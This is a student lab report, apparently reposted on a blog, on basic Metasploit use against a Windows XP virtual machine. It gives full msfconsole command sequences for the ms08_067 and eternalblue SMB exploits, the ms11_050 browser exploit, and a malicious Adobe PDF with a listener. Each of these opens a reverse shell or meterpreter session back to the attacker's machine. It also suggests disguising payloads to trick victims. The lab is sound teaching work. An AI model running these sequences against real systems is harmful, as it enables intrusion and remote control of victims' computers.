20175133 於沛辰 Exp6 MSF基礎應用

1、 實踐內容html

   本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:linux

  • 一個主動攻擊實踐,如ms08_067;(成功,不惟一)
  • 一個針對瀏覽器的攻擊,如ms11_050;(成功,不惟一)
  • 一個針對客戶端的攻擊,如Adobe;(成功,不惟一)
  • 成功應用任何一個輔助模塊(成功,惟一)

2、報告內容shell

 一、實驗環境:windows

·攻擊機:kali linux  ip:192.168.5.146api

·靶機:windows xp  ip:192.168.5.147瀏覽器

·且兩個虛擬機相互ping得通session

二、實驗過程tcp

2.2.1 主動攻擊(成功,不惟一)學習

·主動攻擊 ms17_010_eternalblue(失敗,不惟一)編碼

--雖然攻擊失敗,可是Windows XP 遭受的攻擊後直接藍屏重啓,開機後有告警,,再次嘗試後,Windows XP直接黑屏了,以下圖

use exploit/windows/smb/ms17_010_eternalblue //使用模塊
set payload generic/shell_reverse_tcp //設置tcp反彈鏈接
set LPORT 5133 //攻擊機端口
set LHOST 192.168.5.146 //攻擊機ip
set RHOST 192.168.5.147 //被攻擊者ip
exploit //執行

·主動攻擊 ms08_067_netapi(成功,不惟一)

--攻擊成功,kali終端得到提權,輸入指令能查看到Windows XP 的ip地址:192.168.5.147

use exploit/windows/smb/ms08_067_netapi //使用模塊
set payload generic/shell_reverse_tcp //設置tcp反彈鏈接
set
LPORT 5133 //設置攻擊機端口 set LHOST 192.168.5.146 //設置攻擊機IP set RHOST 192.168.5.147 //設置靶機IP exploit

2.2.2 針對瀏覽器的攻擊(成功,不惟一)

·針對瀏覽器 ms11_50(成功,不惟一)

--在Windows XP 打開生成的連接後創建session並鏈接,輸入指令 session 創建鏈接後,輸入 session -i 1 查看信息

use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http //http反向回連
set LHOST 192.168.5.146 //攻擊機ip
set LPORT 5133 //攻擊端口
set URIPATH 5133ypc //統一資源標識符路徑設置
exploit
//跳轉到生成的連接

2.2.3 針對客戶端的攻擊(成功,不惟一)

·針對客戶端adobe_cooltype_sing(成功,不惟一)

/*生成惡意文件*/
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回連
set LHOST 192.168.5.146 //攻擊機ip
set LPORT 5133 //攻擊端口
set FILENAME 5133.pdf //設置生成pdf文件的名字
exploit
//生成文件成功後會顯示該文件所存儲的目錄
//進入目錄拖拽文件至靶機

/*進入監聽模塊*/
//使用back回到msf
use exploit/multi/handler //進入監聽模塊
set payload windows/meterpreter/reverse_tcp //tcp反向鏈接
set LHOST 192.168.5.146 //攻擊機ip
set LPORT 5133 //攻擊端口固定
exploit
//在靶機中打開文件,攻擊成功

2.2.4 成功應用一個輔助模塊(成功,惟一)

·輔助模塊:auxiliary/scanner/portscan/ack 運用TCP中的ACK響應包檢查端口的開放狀態以及是否被屏蔽(成功,惟一)

use auxiliary/scanner/portscan/ack
search auxiliary

set payload windows/meterpreter/reverse_tcp 
options 

set RHOST 192.168.6.147 
exploit

--在auxiliary中輸入指令 search auxiliary 進行查找

--進行攻擊後以下圖所示,auxiliary模塊執行完畢

 

 

3、問題回答

一、用本身的話解釋什麼是exploit,payload,encode

·exploit:執行攻擊,產生攻擊模塊的文件

·payload:載荷,傳輸進靶機以後爲攻擊者服務

·encode:字面意思,編碼,改變shellcode,對其進行假裝

二、離實戰還缺些什麼技術或步驟?

·技術:技術欠缺不少,不少攻擊不成功都找不到正確的緣由,手段單一,能夠變化更多

·社會工程學攻擊:將生成好的惡意文件或代碼包裝一下發給受害者,找機會進行觸發回連,固然回連也不能被發現

4、實驗感想

  這一次實驗咱們熟悉了MSF的六大模塊,也弄清楚了它們具體的用法,爲我之後的學習打下了必定的基礎,可是也發現了許多操做系統已經修補了之前存在的漏洞,對於我這樣的小萌新來講,找到一個新的漏洞太難啦。

相關文章
相關標籤/搜索